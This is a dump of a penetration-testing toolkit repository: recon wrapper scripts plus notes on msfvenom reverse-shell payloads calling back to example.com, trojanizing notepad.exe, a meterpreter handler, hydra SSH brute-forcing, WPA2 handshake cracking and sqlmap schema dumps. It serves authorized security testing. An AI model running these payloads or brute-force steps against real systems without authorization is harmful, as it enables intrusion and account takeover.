├── reconnaissance ├── shodan │ └── shodanhat │ │ ├── __init__.py │ │ ├── constantes.py │ │ ├── LICENSE │ │ └── README.md ├── mx.sh ├── nameservers.sh ├── ip.sh ├── zone-transfer.sh ├── webrecon.sh ├── ftp-banner.sh ├── smtp-banner.sh ├── whois.sh ├── ips.sh └── hostname.sh ├── snmp ├── community.lst ├── discover.sh └── scan.sh ├── firewall └── subnetslist.example ├── web ├── lists │ ├── big.list │ └── common-content-types.list ├── js-map-decoder │ ├── package.json │ └── README.md ├── nikto.md ├── robots.sh ├── banner-grabbing-nc.sh ├── banner-grabbing-wget-http.sh ├── robots-ssl.sh ├── banner-grabbing-curl-http.sh ├── web-headers-null.sh ├── screenshot.sh ├── web-headers-malformed-2.sh ├── web-headers-malformed.sh ├── banner-grabbing-nc-http.sh ├── banner-grabbing-nmap-script.sh ├── curl-options.sh ├── banner-grabbing-curl-http-proxy.sh ├── banner-grabbing-nmap-built-in.sh ├── nuclei-scan.sh ├── curl-trace.sh ├── curl-options-proxy.sh ├── curl-robots.sh ├── html-to-png-screenshot.sh ├── nikto-scan.sh ├── web-recon.sh ├── web-app-framework.sh ├── nikto-scan-proxy.sh ├── nikto-scan-useragent.sh ├── dir-scanner.sh ├── nikto-scan-useragent-proxy.sh ├── dir-scanner-gobuster.sh ├── dir-scanner-dirsearch-big.sh ├── dir-scanner-dirsearch-medium.sh ├── curl-get.sh ├── wordpress-scan.sh ├── eyewitness.sh ├── dir-scanner-fine-tuned.sh ├── dir-scanner-proxy.sh └── curl-delete.sh ├── misc ├── port-forwarding.md ├── helpful-commands.md ├── openvas.md ├── print-top-tcp-ports.sh ├── responds-to-ping.sh ├── ssh.md └── print-top-udp-ports.sh ├── metasploit ├── binding.md ├── payloads.md └── multi-handler.md ├── wifi ├── wifi.md └── wpa2.md ├── m365 └── Readme.md ├── README.md ├── cracking ├── Readme.md ├── generate-wordlist.sh ├── generate-wordlist-from-site.sh ├── ssh-bf.sh ├── crunch-pattern.sh ├── anonymous-ftp.sh ├── open-relay-smtp.sh ├── crunch-charset.sh ├── smtp-users-enumeration.sh ├── brute-force-smtp-hydra.sh ├── brute-force-ftp-hydra.sh ├── brute-force-rdp-hydra.sh ├── 
brute-force-ssh-hydra.sh ├── brute-force-ftp-medusa.sh ├── brute-force-ssh-medusa.sh ├── oracle-login.sh └── brute-force-smtp-medusa.sh ├── skid └── README.md ├── sqli └── sqlmap.md ├── nessus └── extract-info-nessus.md ├── windows └── wmi.md ├── ssl ├── tlssled.sh └── ssl-scan.sh ├── phishing └── dnstwist.sh ├── smb ├── null-session.sh ├── scan-nbtscan.sh ├── scan-smbclient.sh ├── scan-enum4linux.sh ├── scan-list-contents.sh ├── scan-share-permissions.sh └── scan-execute-command.sh ├── sip ├── scanner-svwar.sh └── sip-dos.sh ├── port-scanning ├── tcp │ ├── tcp-ports-scan-nc.sh │ ├── tcp-ports-scan-delay-nc.sh │ ├── full │ │ ├── tcp-ports-scan-full-delay-nc.sh │ │ ├── tcp-ports-scan-full-delay-sequential-fulltcpcon.sh │ │ ├── tcp-ports-scan-full-delay-sequential-noping-fulltcpcon.sh │ │ ├── tcp-ports-scan-full.sh │ │ ├── tcp-ports-scan-full-nodns.sh │ │ ├── tcp-ports-scan-full-noping.sh │ │ ├── tcp-ports-scan-full-noping-nodns.sh │ │ ├── tcp-ports-scan-full-fast-noping-nodns.sh │ │ ├── tcp-ports-scan-full-maxrate.sh │ │ ├── tcp-ports-scan-full-maxrate-noping.sh │ │ ├── tcp-ports-scan-full-super-fast-noping-nodns.sh │ │ ├── tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh │ │ ├── tcp-ports-scan-full-delay-sequential.sh │ │ └── tcp-ports-scan-full-delay-sequential-noping.sh │ ├── tcp-ports-scan-top1000.sh │ ├── tcp-ports-scan-top1000-noping.sh │ ├── tcp-ports-scan-top1000-noping-nodns.sh │ ├── tcp-ports-scan-top2000-noping-nodns.sh │ ├── tcp-ports-scan-top1000-fast-noping-nodns.sh │ ├── services │ │ ├── tcp-services-scan-top1000-noping.sh │ │ ├── tcp-ports-services-scan-top400-noping.sh │ │ ├── tcp-services-scan-noping.sh │ │ ├── tcp-services-fast-scan-noping.sh │ │ └── tcp-services-super-fast-scan-noping.sh │ ├── tcp-ports-scan-top1000-maxrate-noping.sh │ ├── tcp-ports-scan-top1000-maxrate.sh │ ├── tcp-ports-scan-top1000-slow-noping-nodns.sh │ ├── tcp-ports-scan-top1000-suprt-fast-noping-nodns.sh │ └── tcp-scan-web-server.sh └── udp │ ├── 
udp-ports-scan-top1000.sh │ ├── udp-ports-scan-top1000-nodns.sh │ ├── udp-ports-scan-top1000-noping.sh │ ├── full │ ├── udp-ports-scan-full.sh │ ├── udp-ports-scan-full-nodns.sh │ ├── udp-ports-scan-full-noping.sh │ ├── udp-ports-scan-full-noping-nodns.sh │ ├── udp-ports-scan-full-fast-noping-nodns.sh │ └── udp-ports-scan-full-super-fast-noping-nodns.sh │ ├── udp-ports-scan-top1000-noping-nodns.sh │ ├── udp-ports-scan-top1000-fast-noping-nodns.sh │ ├── services │ ├── udp-services-scan-top1000-noping.sh │ ├── udp-services-scan-top400-noping.sh │ ├── udp-services-scan-noping.sh │ ├── udp-services-fast-scan-noping.sh │ └── udp-services-super-fast-scan-noping.sh │ └── udp-ports-scan-top1000-super-fast-noping-nodns.sh ├── oracle ├── odat-ping.sh ├── odat-sidguesser.sh ├── odat-status.sh ├── odat-version.sh ├── scanner.sh ├── odat-tnspoison.sh ├── oracle-tnscmd-ping.sh ├── oracle-tnscmd-version.sh └── odat-passwordguesser.sh ├── ldap ├── scan-enum4linux.sh └── scan-ldapsearch.sh ├── grep ├── grep-unique-live-hosts.sh ├── grep-unique-live-hosts-having-more-than-one-port-open.sh ├── grep-unique-live-hosts-comma.sh ├── grep-unique-open-ports.sh ├── grep-unique-open-ports-comma.sh ├── grep-list-hosts-and-open-ports-to-csv.sh ├── grep-list-hosts-and-open-ports-to-matrix.sh ├── grep-list-hosts-and-open-ports-to-txt.sh ├── grep-list-hosts-open-ports-and-services-to-matrix.sh └── grep-list-hosts-open-ports-and-services-to-txt.sh ├── live-hosts ├── ping-from-linux.sh ├── discover-local-live-hosts-passively-p0f.sh ├── discover-local-live-hosts-netbios.sh └── discover-local-live-hosts-netdiscover.sh ├── smtp └── user-enum.sh └── applocker └── Readme.md /reconnaissance/shodan/shodanhat/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /snmp/community.lst: -------------------------------------------------------------------------------- 1 | public 2 | 
private 3 | manager 4 | -------------------------------------------------------------------------------- /reconnaissance/shodan/shodanhat/constantes.py: -------------------------------------------------------------------------------- 1 | SHODAN_API_KEY = "" -------------------------------------------------------------------------------- /firewall/subnetslist.example: -------------------------------------------------------------------------------- 1 | 192.168.1.1/24 2 | 192.168.2.1/23 3 | 192.168.3.1/27 -------------------------------------------------------------------------------- /web/lists/big.list: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maldevel/PenTestKit/HEAD/web/lists/big.list -------------------------------------------------------------------------------- /misc/port-forwarding.md: -------------------------------------------------------------------------------- 1 | ## Port Forwarding 2 | 3 | ### Linux Port Forwarding 4 | 5 | * rinetd 6 | -------------------------------------------------------------------------------- /web/js-map-decoder/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "source-map": "^0.7.4" 4 | } 5 | } 6 | -------------------------------------------------------------------------------- /misc/helpful-commands.md: -------------------------------------------------------------------------------- 1 | ## Helpful commands during PT 2 | 3 | **Duplicate each line by appending a copy of it to the end of the same line** 4 | 5 | ```bash 6 | paste -d ' ' filename1 filename1 7 | ``` 8 | 9 | -------------------------------------------------------------------------------- /metasploit/binding.md: -------------------------------------------------------------------------------- 1 | ## File Binding 2 | 3 | ### Executable files 4 | 5 | ```bash 6 | msfvenom -a x86 --platform windows -x notepad.exe -k -p 
windows/meterpreter/reverse_https lhost=example.com lport=443 -b "\x00" -f exe -o new_notepad.exe 7 | ``` 8 | -------------------------------------------------------------------------------- /wifi/wifi.md: -------------------------------------------------------------------------------- 1 | ## WiFi Notes 2 | 3 | ### Debian 4 | 5 | * Add a "non-free" component to /etc/apt/sources.list 6 | 7 | ```bash 8 | sudo apt-get install firmware-atheros 9 | ``` 10 | 11 | [ath9k_htc](https://wiki.debian.org/ath9k_htc) 12 | -------------------------------------------------------------------------------- /m365/Readme.md: -------------------------------------------------------------------------------- 1 | ### Generate possible usernames 2 | 3 | Take a name and transform it into possible username permutations: 4 | 5 | * https://gist.github.com/superkojiman/11076951 6 | 7 | ``` 8 | python3 namemash.py real_names.txt > permutations.txt 9 | ``` 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## PenTestKit 2 | 3 | *Useful tools & scripts during Penetration Testing Engagements* 4 | 5 | *** 6 | 7 | ### Download - Installation 8 | 9 | ```bash 10 | git clone https://github.com/maldevel/PenTestKit.git 11 | cd PenTestKit/ 12 | ``` 13 | -------------------------------------------------------------------------------- /cracking/Readme.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 3 | ### Detecting SSH and Brute-forcing it 4 | 5 | ```sh 6 | nmap -p 22 --open -oG live_hosts.txt x.y.z.0/24 7 | grep "Up" live_hosts.txt | awk '{print $2}' > ips.txt 8 | hydra -l Administrator -P passwords.lst -M ips.txt ssh -t 4 9 | ``` 10 | 11 | --- 12 | -------------------------------------------------------------------------------- /misc/openvas.md: 
-------------------------------------------------------------------------------- 1 | ## OpenVAS 2 | 3 | ### Initializing & Starting OpenVAS 4 | 5 | ```bash 6 | apt-get install openvas 7 | openvas-setup 8 | openvas-start 9 | ``` 10 | 11 | * https://127.0.0.1:9392 12 | 13 | ``` 14 | Username: admin 15 | Password: <set by the openvas-setup script> 16 | ``` 17 | -------------------------------------------------------------------------------- /skid/README.md: -------------------------------------------------------------------------------- 1 | ## README 2 | 3 | ### SKID mode 4 | 5 | ``` 6 | chmod a+x -R PenTestKit/grep 7 | chmod a+x -R PenTestKit/live-hosts 8 | chmod a+x -R PenTestKit/generate-scripts-lists 9 | chmod a+x scan-external-ip-range.sh 10 | sudo ./scan-external-ip-range.sh x.x.x.x/yy 11 | ``` 12 | 13 | --- 14 | -------------------------------------------------------------------------------- /web/lists/common-content-types.list: -------------------------------------------------------------------------------- 1 | application/javascript 2 | application/json 3 | application/x-www-form-urlencoded 4 | application/pdf 5 | application/xml 6 | application/zip 7 | audio/mpeg 8 | audio/vorbis 9 | multipart/form-data 10 | text/css 11 | text/html 12 | text/plain 13 | image/png 14 | image/jpeg 15 | image/gif 16 | -------------------------------------------------------------------------------- /web/nikto.md: -------------------------------------------------------------------------------- 1 | ## Nikto 2 | 3 | ### Scanning an HTTPS target using an HTTP proxy 4 | 5 | * Edit nikto.conf 6 | 7 | ``` 8 | nano /etc/nikto.conf 9 | ``` 10 | 11 | * Change the line ```LW_SSL_ENGINE=auto``` to ```LW_SSL_ENGINE=SSLeay``` 12 | 13 | ``` 14 | nikto -host example.com -port -ssl -output nikto_https_report.html -useproxy http://127.0.0.1:8080 15 | ``` 16 | -------------------------------------------------------------------------------- /metasploit/payloads.md: 
-------------------------------------------------------------------------------- 1 | ## Payload Generation 2 | 3 | ### Reverse https meterpreter 4 | 5 | ```bash 6 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe 7 | ``` 8 | 9 | ```bash 10 | msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_https lhost=example.com lport=443 -f exe -o my.exe 11 | ``` 12 | -------------------------------------------------------------------------------- /web/js-map-decoder/README.md: -------------------------------------------------------------------------------- 1 | # JavaScript Map Decoder 2 | 3 | To use this script, put all the map files in the `map` folder. The script respects the application's folder structure and will create all necessary folders. Decoded files will be placed in the `source-code` folder. 4 | 5 | To run the script: 6 | 7 | ```bash 8 | git clone 9 | npm install 10 | node decode-source-map.js 11 | ``` -------------------------------------------------------------------------------- /sqli/sqlmap.md: -------------------------------------------------------------------------------- 1 | ## SQLmap notes 2 | 3 | ### Get database schema 4 | 5 | * Microsoft SQL Server 6 | * Error-based 7 | * POST 8 | * Burp Pro proxy 9 | * Specific database 10 | 11 | ```bash 12 | sqlmap -v3 -u https://example.com --method=POST --data="post-request-data" --proxy=http://127.0.0.1:8080 -p --os=Windows --technique=E --dbms="Microsoft SQL Server" --schema --dump-format=CSV -D dbname 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /nessus/extract-info-nessus.md: -------------------------------------------------------------------------------- 1 | ## Nessus Information 2 | 3 | * Export the scan results as a CSV file. 
4 | 5 | ### Export Critical Vulnerabilities 6 | 7 | ```bash 8 | cat myproject.csv | grep '"Critical"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 9 | ``` 10 | 11 | ### Export High Vulnerabilities 12 | 13 | ```bash 14 | cat myproject.csv | grep '"High"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 15 | ``` 16 | 17 | ### Export Medium Vulnerabilities 18 | 19 | ```bash 20 | cat myproject.csv | grep '"Medium"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 21 | ``` 22 | 23 | ### Export Low Vulnerabilities 24 | 25 | ```bash 26 | cat myproject.csv | grep '"Low"' | sed 's/"//g' | awk -F',' '{print $5,$6,$7,$8}' | sort 27 | ``` 28 | 29 | -------------------------------------------------------------------------------- /wifi/wpa2.md: -------------------------------------------------------------------------------- 1 | ## WPA2 WiFi Hacking 2 | 3 | ### Enable monitor mode on wireless interface 4 | 5 | **List wireless interfaces supporting monitor mode** 6 | 7 | ```bash 8 | airmon-ng 9 | ``` 10 | 11 | **Enable monitor mode** 12 | 13 | ```bash 14 | airmon-ng start wlan0 15 | ``` 16 | 17 | ### Scan for WiFi networks 18 | 19 | ```bash 20 | airodump-ng wlan0mon 21 | ``` 22 | 23 | ### Packet Capture 24 | 25 | ```bash 26 | airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ wlan0mon 27 | ``` 28 | 29 | ### Inject packets/Capture Handshake 30 | 31 | ```bash 32 | aireplay-ng -0 10 -a [router bssid] -c [client bssid] wlan0mon 33 | ``` 34 | 35 | ### Cracking 36 | 37 | ```bash 38 | aircrack-ng -a2 -b [router bssid] -w /path/to/wordlist /root/Desktop/*.cap 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /windows/wmi.md: -------------------------------------------------------------------------------- 1 | ## Windows Management Instrumentation 2 | 3 | ### Get SID of a local user 4 | 5 | ``` 6 | wmic useraccount where name='username' get sid 7 | ``` 8 | 9 | 10 | ### Get SID for current logged in user 11 | 
12 | ``` 13 | wmic useraccount where name='%username%' get sid 14 | ``` 15 | 16 | ### Get SID for current logged in domain user 17 | 18 | ``` 19 | whoami /user 20 | ``` 21 | 22 | ### Get SID for the local administrator of the computer 23 | 24 | ``` 25 | wmic useraccount where (name='administrator' and domain='%computername%') get name,sid 26 | ``` 27 | 28 | ### Get SID for the domain administrator 29 | 30 | ``` 31 | wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid 32 | ``` 33 | 34 | ### Find username from a SID 35 | 36 | ``` 37 | wmic useraccount where sid='S-x-x-xx-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxx-xxxx' get name 38 | ``` 39 | 40 | -------------------------------------------------------------------------------- /metasploit/multi-handler.md: -------------------------------------------------------------------------------- 1 | ## Multi Handler 2 | 3 | ### Run metasploit multi handler 4 | 5 | ```bash 6 | msfconsole 7 | use exploit/multi/handler 8 | set PAYLOAD windows/meterpreter/reverse_https 9 | set LHOST example.com 10 | set LPORT 443 11 | ``` 12 | 13 | ### Session will never timeout 14 | 15 | ```bash 16 | set SessionCommunicationTimeout 0 17 | ``` 18 | 19 | ### Execute commands on new session connection 20 | 21 | ```bash 22 | set autorunscript multi_console_command -cl "screenshot","sysinfo" 23 | ``` 24 | 25 | ### Don’t exit once the first meterpreter connection is established 26 | 27 | ```bash 28 | set ExitOnSession false 29 | ``` 30 | 31 | ### Run all meterpreter connections in the background automatically 32 | 33 | ```bash 34 | exploit -j 35 | ``` 36 | 37 | ### List sessions 38 | 39 | ```bash 40 | sessions -l 41 | ``` 42 | 43 | ### Interact with a shell 44 | 45 | ```bash 46 | sessions -i 5 47 | ``` 48 | 49 | ### Send interaction with session 5 to background 50 | 51 | Press ctrl+z 52 | -------------------------------------------------------------------------------- /ssl/tlssled.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2025 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 2 ]; then 25 | tlssled $1 $2 26 | else 27 | echo "Please provide the host and the port." 28 | fi 29 | -------------------------------------------------------------------------------- /reconnaissance/mx.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 
13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host -t mx $1 27 | else 28 | echo "Please provide the target host." 29 | fi 30 | -------------------------------------------------------------------------------- /phishing/dnstwist.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2024 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | dnstwist $1 27 | else 28 | echo "Please provide the target Domain name." 
29 | fi 30 | -------------------------------------------------------------------------------- /smb/null-session.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | rpcclient -U "" -N $1 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /web/robots.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 
13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | wget "http://$1/robots.txt" 27 | else 28 | echo "Please provide target host." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/nameservers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host -t ns $1 27 | else 28 | echo "Please provide the target host." 
29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-nc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | nc -v $1 $2 27 | else 28 | echo "Please provide a target host and a port." 29 | fi 30 | -------------------------------------------------------------------------------- /web/banner-grabbing-wget-http.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 
13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | curl "$1" -q -S 27 | else 28 | echo "Please provide a target host." 29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/ip.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | host $1|grep "has address"|cut -d" " -f4 27 | else 28 | echo "Please provide the target host." 
29 | fi 30 | -------------------------------------------------------------------------------- /reconnaissance/zone-transfer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | host -l $1 $2 27 | else 28 | echo "Please provide a target host and a nameserver." 29 | fi 30 | -------------------------------------------------------------------------------- /sip/scanner-svwar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 
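13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scanner-svwar.sh <host> <port>
25 | # Runs svwar with INVITE requests (-m INVITE) against <host> on <port>.
26 | # Both arguments are quoted so they reach svwar as single words.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   svwar -D -m INVITE -p "$2" "$1"
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/snmp/discover.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: discover.sh <host|range>
25 | # UDP scan (-sU, normally needs root) of port 161/SNMP; --open hides
26 | # closed and filtered results.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 1 ]]; then
29 |   nmap -sU --open -p 161 "$1"
30 | else
31 |   echo "Please provide a target host or a target ip range." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
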